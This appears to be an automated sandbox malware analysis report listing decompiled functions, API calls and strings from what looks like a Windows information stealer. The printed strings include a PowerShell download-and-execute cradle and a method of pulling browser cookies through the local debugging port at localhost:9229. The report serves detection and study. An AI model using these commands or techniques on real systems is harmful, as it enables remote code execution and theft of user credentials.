                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 7eb51a29f65d0204b36333d0555e114f50812c3a2f2166e67381b01ddac1976b
                                • Instruction ID: dec43d24cdfca69396a814f721a95a827f6595b3809313b6ee2e10078f4fc222
                                • Opcode Fuzzy Hash: 7eb51a29f65d0204b36333d0555e114f50812c3a2f2166e67381b01ddac1976b
                                • Instruction Fuzzy Hash: 49116671952B21EBC7509FB4EC0DA5A3EB8BB097053088A1AF6D1D22A1FEFC4440DF59
                                Function 004EBE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EBE53
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EBE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 004EBE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EBEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 004EBEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EBEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004EBEEB
                                • lstrlen.KERNEL32(')"), ref: 004EBEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EBF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 004EBF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EBF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 004EBF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EBF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 004EBF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EBFBA
                                • ShellExecuteEx.SHELL32(?), ref: 004EC00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: e707b5f3928e54911087574c6ecd5da00956777317e819579f498669884a0e4a
                                • Instruction ID: 111589c46d998e0098898580a026eb62f7938003bace636f1d9340dbe407e94a
                                • Opcode Fuzzy Hash: e707b5f3928e54911087574c6ecd5da00956777317e819579f498669884a0e4a
                                • Instruction Fuzzy Hash: CE61D370B1025A9BCB21AFBA8D996AF7BA8EF14305F04552BF505D3352DB7CC8018B99
                                Function 004F1820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F184F
                                • lstrlen.KERNEL32(00CE6D70), ref: 004F1860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F18C1
                                • lstrlen.KERNEL32(00504FA0), ref: 004F18D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F18F4
                                • lstrcat.KERNEL32(00000000,00504FA0), ref: 004F1900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F192F
                                • lstrlen.KERNEL32(00CE6D40), ref: 004F1945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F19A6
                                • lstrlen.KERNEL32(00504FA0), ref: 004F19B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F19D9
                                • lstrcat.KERNEL32(00000000,00504FA0), ref: 004F19E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1A14
                                • lstrlen.KERNEL32(00CE6D80), ref: 004F1A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1A8B
                                • lstrlen.KERNEL32(00CE6C80), ref: 004F1AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1B02
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: 5ba0649b138b563cf587140e9afc9dd287e19cbfc6398396147bdfe80de5d04f
                                • Instruction ID: 6f10c92616269894fd5ae0bc32a6b4b89c73ad8eff7c4632181f3896e68c3c37
                                • Opcode Fuzzy Hash: 5ba0649b138b563cf587140e9afc9dd287e19cbfc6398396147bdfe80de5d04f
                                • Instruction Fuzzy Hash: 889110B060170BDBDB209FB6DD98A2777E8AF14344F14952AA686C3361DF7CE841CB58
                                Function 004E4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004E47C5
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E4812
                                • lstrlen.KERNEL32(00504B60), ref: 004E481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E483A
                                • lstrcat.KERNEL32(00000000,00504B60), ref: 004E4846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E48A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E48CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 004E48DC
                                • lstrlen.KERNEL32(?), ref: 004E48F0
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E4931
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E49B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E49E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: f971ac96d1aa7ca4c45cbabd271fb4a3cfe607f25a107570ad08b38878efe88e
                                • Instruction ID: 0ab0c5a95d8cec6a577e1839b0c073b7c9d29c734da72206714eb5ee217b54f6
                                • Opcode Fuzzy Hash: f971ac96d1aa7ca4c45cbabd271fb4a3cfe607f25a107570ad08b38878efe88e
                                • Instruction Fuzzy Hash: CEB1D371B1025A9BCB21EF76D999AAF77B4AF90305F04412BF941A7311DB7CEC018B98
                                Function 004D92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004D90C0: InternetOpenA.WININET(004FCFEC,00000001,00000000,00000000,00000000), ref: 004D90DF
                                  • Part of subcall function 004D90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004D90FC
                                  • Part of subcall function 004D90C0: InternetCloseHandle.WININET(00000000), ref: 004D9109
                                • strlen.MSVCRT ref: 004D92E1
                                • strlen.MSVCRT ref: 004D92FA
                                  • Part of subcall function 004D8980: std::_Xinvalid_argument.LIBCPMT ref: 004D8996
                                • strlen.MSVCRT ref: 004D9399
                                • strlen.MSVCRT ref: 004D93E6
                                • lstrcat.KERNEL32(?,cookies), ref: 004D9547
                                • lstrcat.KERNEL32(?,00501794), ref: 004D9559
                                • lstrcat.KERNEL32(?,?), ref: 004D956A
                                • lstrcat.KERNEL32(?,00504B98), ref: 004D957C
                                • lstrcat.KERNEL32(?,?), ref: 004D958D
                                • lstrcat.KERNEL32(?,.txt), ref: 004D959F
                                • lstrlen.KERNEL32(?), ref: 004D95B6
                                • lstrlen.KERNEL32(?), ref: 004D95DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D9614
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 783610e0e8f42b94f1863a231d2723b3a52dd1b503b826747ac2952967c96a53
                                • Instruction ID: 56f41ebaf5ba597b8388a27f28a69486f4d0a3bebe12d5d8e13f695b551d7d31
                                • Opcode Fuzzy Hash: 783610e0e8f42b94f1863a231d2723b3a52dd1b503b826747ac2952967c96a53
                                • Instruction Fuzzy Hash: F4E12871E00218EBDF10DFA8D990ADEBBB5BF58304F1044AAE509A7341DB789E45CF95
                                Function 004ED980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004ED9A1
                                • memset.MSVCRT ref: 004ED9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004ED9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EDA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 004EDA1C
                                • lstrcat.KERNEL32(?,00CFF840), ref: 004EDA36
                                • lstrcat.KERNEL32(?,?), ref: 004EDA4A
                                • lstrcat.KERNEL32(?,00CFE028), ref: 004EDA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EDA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004EDA95
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EDAFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: ad23560af97ec4dadd31ddf3c3fe0109341d761841039b493de80fef39a7da60
                                • Instruction ID: 978568add93396d8ead542269e4ed3f6e7cd21bab4aba3bdb610562a5bee961c
                                • Opcode Fuzzy Hash: ad23560af97ec4dadd31ddf3c3fe0109341d761841039b493de80fef39a7da60
                                • Instruction Fuzzy Hash: 72B1D0B1E002599FDB10EFA5DC949EE77B8EF48300F10856AE946E7351DA389E44CB98
                                Function 004DB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DB330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DB3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB3D9
                                • lstrlen.KERNEL32(00504C50), ref: 004DB450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB474
                                • lstrcat.KERNEL32(00000000,00504C50), ref: 004DB480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB4A9
                                • lstrlen.KERNEL32(00000000), ref: 004DB52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DB55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB587
                                • lstrlen.KERNEL32(00504AD4), ref: 004DB5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB622
                                • lstrcat.KERNEL32(00000000,00504AD4), ref: 004DB62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB65E
                                • lstrlen.KERNEL32(?), ref: 004DB767
                                • lstrlen.KERNEL32(?), ref: 004DB776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB79E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 1e1ff2b26617b462b9d56912281da567a8b82a050345a87cdbb19827855d8675
                                • Instruction ID: 582cc705d5ca9b4ad7e92311cb075b1f588a0cfeafcb5dfc67a8cf41523343c4
                                • Opcode Fuzzy Hash: 1e1ff2b26617b462b9d56912281da567a8b82a050345a87cdbb19827855d8675
                                • Instruction Fuzzy Hash: F4022E70A01205CFCB25DF65D968B6AB7B1EF44308F19816FE5099B362DB79DC42CB88
                                Function 004F3760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004F71FE
                                • RegOpenKeyExA.ADVAPI32(?,00CF8A20,00000000,00020019,?), ref: 004F37BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004F37F7
                                • wsprintfA.USER32 ref: 004F3822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004F3840
                                • RegCloseKey.ADVAPI32(?), ref: 004F384E
                                • RegCloseKey.ADVAPI32(?), ref: 004F3858
                                • RegQueryValueExA.ADVAPI32(?,00CFF3A8,00000000,000F003F,?,?), ref: 004F38A1
                                • lstrlen.KERNEL32(?), ref: 004F38B6
                                • RegQueryValueExA.ADVAPI32(?,00CFF390,00000000,000F003F,?,00000400), ref: 004F3927
                                • RegCloseKey.ADVAPI32(?), ref: 004F3972
                                • RegCloseKey.ADVAPI32(?), ref: 004F3989
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: c8df6b1a45f1bea4d9b1765e02e529edfd52ed95afce6d56a68b9bd1eba1555d
                                • Instruction ID: bc592a6d402b75deda9d41f1fba0c4e74215695a428911cdbe9b600cf8b8616d
                                • Opcode Fuzzy Hash: c8df6b1a45f1bea4d9b1765e02e529edfd52ed95afce6d56a68b9bd1eba1555d
                                • Instruction Fuzzy Hash: 6A91AFB2900209DFCB10DFA5CD809AEB7B9FB48314F14816AE609A7351DB79AE41CF94
                                Function 004D90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenA.WININET(004FCFEC,00000001,00000000,00000000,00000000), ref: 004D90DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004D90FC
                                • InternetCloseHandle.WININET(00000000), ref: 004D9109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 004D9166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 004D9197
                                • InternetCloseHandle.WININET(00000000), ref: 004D91A2
                                • InternetCloseHandle.WININET(00000000), ref: 004D91A9
                                • strlen.MSVCRT ref: 004D91BA
                                • strlen.MSVCRT ref: 004D91ED
                                • strlen.MSVCRT ref: 004D922E
                                • strlen.MSVCRT ref: 004D924C
                                  • Part of subcall function 004D8980: std::_Xinvalid_argument.LIBCPMT ref: 004D8996
                                Strings
                                Memory Dump Source
